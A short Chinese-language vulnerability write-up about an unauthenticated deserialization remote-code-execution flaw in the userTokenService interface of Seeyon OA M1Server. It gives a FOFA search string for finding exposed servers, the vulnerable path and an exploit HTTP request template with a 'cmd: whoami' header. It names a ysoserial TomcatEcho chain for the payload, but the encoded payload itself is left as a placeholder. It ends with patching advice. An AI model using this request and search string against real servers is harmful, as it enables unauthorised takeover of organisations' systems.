0x01 产品简介
致远M1移动协同软件,结合移动应用特色的信息终端,帮您高效管理,掌控全局;基于移动互联技术的产品,实现全天候在线,随时随地了解企业信息;触控式操作,舒适的滑动体验,全面支持iPad 、iPhone、Android智能终端,让工作步入时尚舒适季。
0x02 漏洞概述
致远OA M1Server userTokenService 接口存在反序列化漏洞,未经授权的攻击者构造恶意的序列化数据可造成远程代码执行,最终可以获取服务器权限。
0x03 影响范围
致远OA M1Server
0x04 复现环境
FOFA:"M1-Server 已启动"
0x05 漏洞复现
http://your-ip/esn_mobile_pns/service/userTokenService
出现以上这种情况可能存在漏洞
Exp:
POST /esn_mobile_pns/service/userTokenService HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: application/x-www-form-urlencoded
cmd: whoami
{{base64dec()}}
PS:yso的TomcatEcho回显链+yakit base64编码
RCE
0x06 修复建议
关闭互联网暴露面或接口添加访问权限
升级至安全版本或打补丁